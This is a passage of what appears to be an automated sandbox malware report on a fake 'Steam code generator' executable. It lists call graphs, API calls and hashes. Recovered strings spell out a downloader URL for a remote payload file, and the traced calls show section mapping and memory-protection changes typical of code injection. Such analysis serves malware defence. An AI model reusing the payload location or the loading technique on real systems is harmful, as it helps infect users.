Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19305->19307 19306->19304 19307->19308 19308->18869 19310 7ff71c054ba1 19309->19310 19313 7ff71c051350 19310->19313 19318 7ff71c056688 19313->19318 19323 7ff71c056518 19318->19323 19322 7ff71c0566aa 19331 7ff71c05a8d8 19323->19331 19325 7ff71c05654c 19326 7ff71c05ab1c 19325->19326 19327 7ff71c05ab3b 19326->19327 19328 7ff71c05ab64 RtlPcToFileHeader 19327->19328 19329 7ff71c05ab86 RaiseException 19327->19329 19330 7ff71c05ab7c 19328->19330 19329->19322 19330->19329 19332 7ff71c05a92e __vcrt_freefls 19331->19332 19333 7ff71c05a8f9 19331->19333 19332->19325 19333->19332 19334 7ff71c061b00 __std_exception_copy 47 API calls 19333->19334 19334->19332 19336 7ff71c06a298 _Getctype 47 API calls 19335->19336 19337 7ff71c068151 19336->19337 19338 7ff71c064e4c BuildCatchObjectHelperInternal 47 API calls 19337->19338 19339 7ff71c068171 19338->19339 19340 7ff71c056130 19342 7ff71c056164 19340->19342 19353 7ff71c0562ac ISource _Yarn 19340->19353 19341 7ff71c05635e 19374 7ff71c056370 19341->19374 19342->19341 19345 7ff71c056207 19342->19345 19346 7ff71c0561bb 19342->19346 19342->19353 19350 7ff71c058db8 std::_Facet_Register 49 API calls 19345->19350 19352 7ff71c0561ca _Yarn 19345->19352 19348 7ff71c056358 19346->19348 19354 7ff71c058db8 19346->19354 19368 7ff71c0512b0 19348->19368 19350->19352 19352->19353 19363 7ff71c062044 19352->19363 19356 7ff71c058dc3 19354->19356 19355 7ff71c058ddc 19355->19352 19356->19355 19357 7ff71c065484 std::_Facet_Register 2 API calls 19356->19357 19358 7ff71c058de2 19356->19358 19357->19356 19359 7ff71c058ded 19358->19359 19377 7ff71c056668 19358->19377 19361 7ff71c0512b0 Concurrency::cancel_current_task 49 API calls 19359->19361 19362 7ff71c058df3 ISource 19361->19362 19362->19352 19364 7ff71c061ebc _invalid_parameter_noinfo_noreturn 47 API calls 19363->19364 19365 7ff71c06205d 19364->19365 19366 7ff71c062074 _invalid_parameter_noinfo_noreturn 17 API calls 19365->19366 19367 7ff71c062072 19366->19367 19369 7ff71c0512be Concurrency::cancel_current_task 19368->19369 19370 7ff71c05ab1c Concurrency::cancel_current_task 2 API calls 19369->19370 19371 7ff71c0512cf 19370->19371 19372 7ff71c05a8d8 __std_exception_copy 47 API calls 19371->19372 19373 7ff71c0512f9 19372->19373 19373->19341 19375 7ff71c056688 49 API calls 19374->19375 19376 7ff71c056380 19375->19376 19378 7ff71c056676 std::bad_alloc::bad_alloc 19377->19378 19379 7ff71c05ab1c Concurrency::cancel_current_task 2 API calls 19378->19379 19380 7ff71c056687 19379->19380 19381 7ff71c068b30 19382 7ff71c068b7b 19381->19382 19383 7ff71c068b3f memcpy_s 19381->19383 19385 7ff71c064848 memcpy_s 11 API calls 19382->19385 19383->19382 19384 7ff71c068b62 HeapAlloc 19383->19384 19387 7ff71c065484 std::_Facet_Register 2 API calls 19383->19387 19384->19383 19386 7ff71c068b79 19384->19386 19385->19386 19387->19383 19388 20c747379f8 VirtualAlloc 19389 20c74737a10 19388->19389 19390 20c74737a3c 19388->19390 19390->19389 19402 20c7473943b 19390->19402 19392 20c74737ab0 19392->19389 19393 20c74737b07 19392->19393 19431 20c747391ab 19392->19431 19393->19389 19394 20c7473943b LoadLibraryA 19393->19394 19395 20c74737b47 19393->19395 19394->19393 19395->19389 19401 20c74737bbe 19395->19401 19435 20c747368fb 19395->19435 19398 20c74737ba5 19398->19389 19442 20c74736a27 19398->19442 19401->19389 19406 20c7473819f 19401->19406 19404 20c74739472 19402->19404 19403 20c74739497 19403->19392 19404->19403 19447 20c74736f47 19404->19447 19407 20c747381f3 19406->19407 19408 20c7473824b NtCreateSection 19407->19408 19410 20c7473827a 19407->19410 19430 20c74738a27 19407->19430 19408->19410 19408->19430 19409 20c74738320 NtMapViewOfSection 19416 20c74738374 19409->19416 19410->19409 19410->19430 19411 20c747386ef VirtualAlloc 19418 20c747387a6 19411->19418 19412 20c747391ab LoadLibraryA 19412->19416 19414 20c747391ab LoadLibraryA 19415 20c74738650 19414->19415 19415->19411 19415->19414 19424 20c74739293 LoadLibraryA 19415->19424 19416->19412 19416->19415 19421 20c74739293 LoadLibraryA 19416->19421 19416->19430 19417 20c747388a2 VirtualProtect 19419 20c747389b5 VirtualProtect 19417->19419 19420 20c747388ca 19417->19420 19418->19417 19422 20c7473881e NtUnmapViewOfSection 19418->19422 19427 20c747389f1 19419->19427 19425 20c747389a8 19420->19425 19429 20c7473897b VirtualProtect 19420->19429 19421->19416 19423 20c74738836 NtMapViewOfSection 19422->19423 19422->19430 19423->19417 19423->19430 19424->19415 19425->19419 19427->19430 19461 20c74738f4f 19427->19461 19429->19420 19430->19389 19433 20c747391c9 19431->19433 19432 20c74739274 LoadLibraryA 19434 20c7473927c 19432->19434 19433->19432 19433->19434 19434->19392 19436 20c747391ab LoadLibraryA 19435->19436 19437 20c7473691a 19436->19437 19438 20c74739293 LoadLibraryA 19437->19438 19441 20c74736922 19437->19441 19439 20c74736941 19438->19439 19440 20c74739293 LoadLibraryA 19439->19440 19439->19441 19440->19441 19441->19398 19443 20c747391ab LoadLibraryA 19442->19443 19444 20c74736a45 19443->19444 19445 20c74739293 LoadLibraryA 19444->19445 19446 20c74736a5a 19445->19446 19446->19401 19448 20c74736f87 19447->19448 19450 20c7473701e 19447->19450 19448->19450 19451 20c747370ff 19448->19451 19450->19404 19452 20c74737142 19451->19452 19456 20c7473716b 19451->19456 19454 20c7473717b 19452->19454 19452->19456 19457 20c74739293 19452->19457 19453 20c747391ab LoadLibraryA 19453->19454 19454->19450 19456->19453 19456->19454 19458 20c74739403 19457->19458 19459 20c747392c9 19457->19459 19458->19452 19459->19458 19460 20c747370ff LoadLibraryA 19459->19460 19460->19458 19464 20c74738f8b 19461->19464 19462 20c74739187 19462->19430 19463 20c74739293 LoadLibraryA 19463->19464 19464->19462 19464->19463

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 7ff71c052230-7ff71c052413 call 7ff71c054cf0 * 5 call 7ff71c054a50 call 7ff71c053b80 * 3 19 7ff71c052447-7ff71c052463 0->19 20 7ff71c052415-7ff71c052427 0->20 21 7ff71c052497-7ff71c0524b2 19->21 22 7ff71c052465-7ff71c052477 19->22 23 7ff71c052429-7ff71c05243c 20->23 24 7ff71c052442 call 7ff71c058db0 20->24 29 7ff71c0524b4-7ff71c0524c6 21->29 30 7ff71c0524e6-7ff71c05252a SleepEx call 7ff71c051f20 21->30 27 7ff71c052479-7ff71c05248c 22->27 28 7ff71c052492 call 7ff71c058db0 22->28 23->24 25 7ff71c052756-7ff71c05275b call 7ff71c062044 23->25 24->19 32 7ff71c05275c-7ff71c052761 call 7ff71c062044 25->32 27->28 27->32 28->21 34 7ff71c0524c8-7ff71c0524db 29->34 35 7ff71c0524e1 call 7ff71c058db0 29->35 44 7ff71c05252c-7ff71c05254c VirtualAlloc 30->44 45 7ff71c052571 30->45 39 7ff71c052762-7ff71c052767 call 7ff71c062044 32->39 34->35 34->39 35->30 52 7ff71c052768-7ff71c05276d call 7ff71c062044 39->52 44->45 46 7ff71c05254e-7ff71c05256f call 7ff71c0795a0 VirtualFree 44->46 47 7ff71c052577-7ff71c05257a 45->47 46->47 50 7ff71c05257c-7ff71c05258d 47->50 51 7ff71c0525b1-7ff71c0525b9 47->51 54 7ff71c0525a8-7ff71c0525b0 call 7ff71c058db0 50->54 55 7ff71c05258f-7ff71c0525a2 50->55 56 7ff71c0525bb-7ff71c0525cc 51->56 57 7ff71c0525ec-7ff71c052605 51->57 66 7ff71c05276e-7ff71c052773 call 7ff71c062044 52->66 54->51 55->52 55->54 62 7ff71c0525ce-7ff71c0525e1 56->62 63 7ff71c0525e7 call 7ff71c058db0 56->63 59 7ff71c052607-7ff71c052618 57->59 60 7ff71c052639-7ff71c052641 57->60 67 7ff71c05261a-7ff71c05262d 59->67 68 7ff71c052633-7ff71c052638 call 7ff71c058db0 59->68 70 7ff71c052643-7ff71c052654 60->70 71 7ff71c052675-7ff71c05267d 60->71 62->63 62->66 63->57 74 7ff71c052774-7ff71c052779 call 7ff71c062044 66->74 67->68 67->74 68->60 76 7ff71c052656-7ff71c052669 70->76 77 7ff71c05266f-7ff71c052674 call 7ff71c058db0 70->77 78 7ff71c05267f-7ff71c052690 71->78 79 7ff71c0526b1-7ff71c0526b9 71->79 85 7ff71c05277a-7ff71c05277f call 7ff71c062044 74->85 76->77 76->85 77->71 87 7ff71c0526ab-7ff71c0526b0 call 7ff71c058db0 78->87 88 7ff71c052692-7ff71c0526a5 78->88 82 7ff71c0526bb-7ff71c0526cc 79->82 83 7ff71c0526ed-7ff71c0526f5 79->83 92 7ff71c0526ce-7ff71c0526e1 82->92 93 7ff71c0526e7-7ff71c0526ec call 7ff71c058db0 82->93 95 7ff71c0526f7-7ff71c052708 83->95 96 7ff71c052724-7ff71c05274f call 7ff71c058d90 83->96 89 7ff71c052780-7ff71c052785 call 7ff71c062044 85->89 87->79 88->87 88->89 99 7ff71c052786-7ff71c05278b call 7ff71c062044 89->99 92->93 92->99 93->83 103 7ff71c05270a-7ff71c05271d 95->103 104 7ff71c05271f call 7ff71c058db0 95->104 103->104 109 7ff71c052750-7ff71c052755 call 7ff71c062044 103->109 104->96 109->25
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Virtual$AllocFreeSleep
                                                                                                                          • String ID: Downloader$htt$nts/files/17267811/stm.txt$om/user-attachme$ps://gith$ub.c
                                                                                                                          • API String ID: 1298506739-3644530041
                                                                                                                          • Opcode ID: ea04dfb8b05b74b2b0620327f61315c56e469aa5f16ef72dec762d63fb4ec1f1
                                                                                                                          • Instruction ID: 2713d3e6af263ab54ab6fbba1ef888107c3dc5615fba8a67d6a89a728fb30c4e
                                                                                                                          • Opcode Fuzzy Hash: ea04dfb8b05b74b2b0620327f61315c56e469aa5f16ef72dec762d63fb4ec1f1
                                                                                                                          • Instruction Fuzzy Hash: 1DE1A462E14F8546EA00EBB4D8453EDA771EF957B4F609321EB5C12ADADF38E5C48310
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020C74730000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_20c74730000_steamcodegenerator.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: SectionVirtual$ProtectView$AllocCreateUnmap
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 1653215272-2766056989
                                                                                                                          • Opcode ID: 2ed318d2ea2cf2278bd42e912a4e74bd6f32db374bd63d65325d2cd2078d0a12
                                                                                                                          • Instruction ID: bbb6aa073826f17d28d66a6f97528f1928a67cd9928eb00d969b4fdc6bc61509
                                                                                                                          • Opcode Fuzzy Hash: 2ed318d2ea2cf2278bd42e912a4e74bd6f32db374bd63d65325d2cd2078d0a12
                                                                                                                          • Instruction Fuzzy Hash: FD72BC70614B488FDB6DDF28C8897A9B3E6FB98314F25461DD84BC7252DB34E582CB41

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 297 20c747391ab-20c747391c7 298 20c747391e2-20c747391f1 297->298 299 20c747391c9-20c747391cd 297->299 301 20c7473921d-20c7473922f 298->301 302 20c747391f3-20c74739218 298->302 299->298 300 20c747391cf-20c747391e0 299->300 300->298 300->299 303 20c74739232-20c74739239 301->303 302->301 304 20c74739274-20c74739279 LoadLibraryA 303->304 305 20c7473923b-20c7473924a 303->305 308 20c7473927c-20c7473928b 304->308 306 20c7473924c-20c74739265 call 20c74739a17 305->306 307 20c74739267-20c7473926d 305->307 306->307 312 20c7473928c-20c7473928f 306->312 307->303 310 20c7473926f-20c74739272 307->310 310->304 310->308 312->308
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020C74730000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_20c74730000_steamcodegenerator.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: l
                                                                                                                          • API String ID: 1029625771-2517025534
                                                                                                                          • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                                                                          • Instruction ID: 7b6a69617352186cbd44f8e888bdbfcaae7df42528b7d1ed4aa7cabd9e599a30
                                                                                                                          • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                                                                          • Instruction Fuzzy Hash: 383164A0918BC58FE759DB288148B55FBDAFB9A308F3456ADC0DAC7163D734D846CB01

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 313 7ff71c056130-7ff71c05615e 314 7ff71c056164-7ff71c056179 313->314 315 7ff71c056345-7ff71c056352 313->315 316 7ff71c0562cd-7ff71c0562d6 314->316 317 7ff71c05617f-7ff71c056198 314->317 318 7ff71c056318-7ff71c056338 call 7ff71c0795a0 * 2 316->318 319 7ff71c0562d8-7ff71c056316 call 7ff71c0795a0 * 3 316->319 320 7ff71c05619e-7ff71c0561b9 317->320 321 7ff71c05635f-7ff71c056364 call 7ff71c056370 317->321 345 7ff71c05633d 318->345 319->345 323 7ff71c0561bb 320->323 324 7ff71c0561e1-7ff71c0561f6 320->324 328 7ff71c0561c5 call 7ff71c058db8 323->328 330 7ff71c056207-7ff71c05620a 324->330 331 7ff71c0561f8-7ff71c0561ff 324->331 343 7ff71c0561ca-7ff71c0561cd 328->343 337 7ff71c05620c-7ff71c056217 call 7ff71c058db8 330->337 338 7ff71c056219 330->338 335 7ff71c056359-7ff71c05635e call 7ff71c0512b0 331->335 336 7ff71c056205 331->336 335->321 336->328 340 7ff71c05621b-7ff71c05623d call 7ff71c0795a0 337->340 338->340 356 7ff71c05623f-7ff71c056242 340->356 357 7ff71c056251-7ff71c05626e call 7ff71c0795a0 340->357 349 7ff71c056353-7ff71c056358 call 7ff71c062044 343->349 350 7ff71c0561d3-7ff71c0561df 343->350 345->315 349->335 350->340 356->357 358 7ff71c056244-7ff71c05624f 356->358 360 7ff71c056271-7ff71c056281 call 7ff71c0795a0 357->360 358->360 364 7ff71c056283-7ff71c056291 360->364 365 7ff71c0562b4-7ff71c0562cb 360->365 366 7ff71c056293-7ff71c0562a6 364->366 367 7ff71c0562af call 7ff71c058db0 364->367 365->345 366->349 369 7ff71c0562ac 366->369 367->365 369->367
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 73155330-0
                                                                                                                          • Opcode ID: c35681c349dced017d86a5f3adb7903ad82b0333e43f206d0047bf9162d83481
                                                                                                                          • Instruction ID: 0c2d85cbb13b720bf6d760dd39e2ae1513b9466979c7218022cccb7426b57c59
                                                                                                                          • Opcode Fuzzy Hash: c35681c349dced017d86a5f3adb7903ad82b0333e43f206d0047bf9162d83481
                                                                                                                          • Instruction Fuzzy Hash: A3510362B19F9546E910AAA2AD082FDA360AF55FE0FE48231DF5D07B85DF3CE149C310

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1236291503-0
                                                                                                                          • Opcode ID: d1d0374af1531000f124c1798acd8703a075724bd8eabcca79cb574d2685e6b7
                                                                                                                          • Instruction ID: 612ad1c1fb71183c3fb55467d973004fec87fa4827dc9e9a2fb0348af961a1ca
                                                                                                                          • Opcode Fuzzy Hash: d1d0374af1531000f124c1798acd8703a075724bd8eabcca79cb574d2685e6b7
                                                                                                                          • Instruction Fuzzy Hash: CF314D21A0CE9346FA14BBE49C113F9A361AF46764FE41534EB4D0B6D7DF2EA50D8231

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileHandleType
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3000768030-0
                                                                                                                          • Opcode ID: 080277b50c5276ac360943eb1b1c156bec9c5cf942e338d9d9fe34af66a790ff
                                                                                                                          • Instruction ID: 310b1b53f369f1af6a040e164a6461a55b73642f6afb207ecdbeae2185a2d2d9
                                                                                                                          • Opcode Fuzzy Hash: 080277b50c5276ac360943eb1b1c156bec9c5cf942e338d9d9fe34af66a790ff
                                                                                                                          • Instruction Fuzzy Hash: C7319221B18F5551EB20AF558D851B8F660FB45BB0BB41729DB6E073E0CF38E595C310

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1173176844-0
                                                                                                                          • Opcode ID: 44696b21bd67145d8e0760ec95888dcbd043158a58de3966fd1fe4f79ebb6704
                                                                                                                          • Instruction ID: 4e01c01c536d481ace076417f270c733188cb44f43fbc949413292ced15f9a51
                                                                                                                          • Opcode Fuzzy Hash: 44696b21bd67145d8e0760ec95888dcbd043158a58de3966fd1fe4f79ebb6704
                                                                                                                          • Instruction Fuzzy Hash: 63F03010E59A0642FD5936E55C061F592A44F18770EB80730DF7C093C2EF1CA59D8230

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3398854857.0000020C74771000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000020C74771000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_20c74771000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Exec
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 459137531-0
                                                                                                                          • Opcode ID: 1ce1e83e12cea887f5631db8c3beb4c8b375af077da88e97cfda06e046574df1
                                                                                                                          • Instruction ID: be6b6a9f6706193e6807ece303a74b0646a1e8a135fd971295c7e98098274022
                                                                                                                          • Opcode Fuzzy Hash: 1ce1e83e12cea887f5631db8c3beb4c8b375af077da88e97cfda06e046574df1
                                                                                                                          • Instruction Fuzzy Hash: 3C316171644E084FEB48FF74DC5DAA977AAE798301F50853A940BC7272DA78CA05CB40

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 540 20c747379f8-20c74737a0e VirtualAlloc 541 20c74737a3c-20c74737a65 call 20c747399bb call 20c747399db 540->541 542 20c74737a10-20c74737a17 540->542 550 20c74737aa1-20c74737ab7 call 20c7473943b 541->550 551 20c74737a67-20c74737a9b call 20c747395ef call 20c747394af 541->551 543 20c74737a1d 542->543 544 20c74737a19 542->544 546 20c74737a20-20c74737a3b 543->546 544->543 550->543 557 20c74737abd-20c74737abe 550->557 551->550 560 20c74737cf6-20c74737cf7 551->560 559 20c74737ac4-20c74737aca 557->559 561 20c74737acc 559->561 562 20c74737b07-20c74737b12 559->562 565 20c74737cfc-20c74737d0d 560->565 566 20c74737ace-20c74737ad0 561->566 563 20c74737b47-20c74737b50 562->563 564 20c74737b14-20c74737b2e call 20c7473943b 562->564 568 20c74737b52-20c74737b62 call 20c74736ab7 563->568 569 20c74737b71-20c74737b7a 563->569 583 20c74737b3d-20c74737b45 564->583 584 20c74737b30-20c74737b37 564->584 570 20c74737d0f-20c74737d19 565->570 571 20c74737d40-20c74737d61 call 20c747399db 565->571 572 20c74737ad2-20c74737ad8 566->572 573 20c74737ae9-20c74737aeb 566->573 568->565 592 20c74737b68-20c74737b6f 568->592 569->565 579 20c74737b80-20c74737b8a 569->579 570->571 577 20c74737d1b-20c74737d39 call 20c747399db 570->577 600 20c74737d63 571->600 601 20c74737d67-20c74737d69 571->601 572->573 578 20c74737ada-20c74737ae7 572->578 573->562 580 20c74737aed-20c74737b05 call 20c747391ab 573->580 577->571 578->566 578->573 587 20c74737b8c-20c74737b8d 579->587 588 20c74737b94-20c74737b9b 579->588 580->559 583->563 583->564 584->560 584->583 587->588 590 20c74737bcf-20c74737bd3 588->590 591 20c74737b9d-20c74737ba7 call 20c747368fb 588->591 596 20c74737c86-20c74737c8e 590->596 597 20c74737bd9-20c74737c02 590->597 604 20c74737bb6-20c74737bc0 call 20c74736a27 591->604 605 20c74737ba9-20c74737bb0 591->605 592->588 602 20c74737ce0-20c74737ce6 call 20c7473819f 596->602 603 20c74737c90-20c74737c96 596->603 597->565 613 20c74737c08-20c74737c22 call 20c747399bb 597->613 600->601 601->546 611 20c74737ceb-20c74737cf2 602->611 607 20c74737cad-20c74737cbf call 20c7473771f 603->607 608 20c74737c98-20c74737c9e 603->608 604->590 622 20c74737bc2-20c74737bc9 604->622 605->565 605->604 620 20c74737cd1-20c74737cde call 20c747371af 607->620 621 20c74737cc1-20c74737ccc call 20c74737d6f 607->621 608->611 612 20c74737ca0-20c74737cab call 20c74738c53 608->612 611->565 617 20c74737cf4 611->617 612->611 625 20c74737c3e-20c74737c81 613->625 626 20c74737c24-20c74737c27 613->626 617->617 620->611 621->620 622->565 622->590 625->565 634 20c74737c83-20c74737c84 625->634 626->596 629 20c74737c29-20c74737c3c call 20c7473973f 626->629 629->634 634->596
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020C74730000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_20c74730000_steamcodegenerator.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocCreateSectionVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1590197315-0
                                                                                                                          • Opcode ID: eb4d697b95cde0fb80402334880357f1ef1fd47815b20976dc2f64c6329480eb
                                                                                                                          • Instruction ID: f8d98abc876ddba08bcd393e3928876d76473fb62192d3d2af2e349544d83e64
                                                                                                                          • Opcode Fuzzy Hash: eb4d697b95cde0fb80402334880357f1ef1fd47815b20976dc2f64c6329480eb
                                                                                                                          • Instruction Fuzzy Hash: ECB1E870B14B454BEB6DDB2884997A9F3DAFB85300F248369D44AC7197DB30E886CF81

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF71C0590E4
                                                                                                                            • Part of subcall function 00007FF71C05AE30: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF71C05AE38
                                                                                                                            • Part of subcall function 00007FF71C05AE30: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF71C05AE3D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1208906642-0
                                                                                                                          • Opcode ID: 474fc897f0be47f68d46e62fd6981f481194b323a22c8996711b27343b9b6b83
                                                                                                                          • Instruction ID: 21515bf6043fbfd70688bd66d30d56811b41bfff476d407699e7661b22d86950
                                                                                                                          • Opcode Fuzzy Hash: 474fc897f0be47f68d46e62fd6981f481194b323a22c8996711b27343b9b6b83
                                                                                                                          • Instruction Fuzzy Hash: 77E09220E1DA9386FEA436E11E0A2F996605F22364FF05978DA4D021839F0F658F5631

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF71C06F7B1,?,?,00000000,00007FF71C074803,?,?,?,00007FF71C067CF3,?,?,?,00007FF71C067BE9), ref: 00007FF71C068B6E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
